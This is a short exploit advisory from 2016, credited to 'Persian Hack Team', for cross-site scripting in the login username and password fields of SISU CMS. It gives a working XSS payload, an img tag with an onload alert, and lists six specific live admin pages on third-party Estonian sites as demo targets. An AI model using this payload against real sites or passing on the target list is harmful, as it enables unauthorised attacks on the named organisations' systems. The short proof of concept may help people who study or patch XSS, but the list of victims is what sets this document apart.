######################
# Exploit Title : SISU CMS - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.laborint.com/
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/05/26
######################
#
# PoC:
# username and password Box vulnerable To XSS
# Payload = <img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg" onload="alert('XSS')"</img>
# Demo :
# http://www.muuseum.ee/admin/
# http://www.etdm.ee/admin/
# http://www.dormitorium.ee/admin/
# http://www.meredivisjon.ee/admin/
# http://www.trt.ee/admin/
# http://www.thky.ee/admin/
#
######################
# Discovered by :
# Mojtaba MobhaM & T3NZOG4N & FireKernel
# Greetz : Milad Hacking And All Persian Hack Team Members
# Homepage : persian-team.ir
######################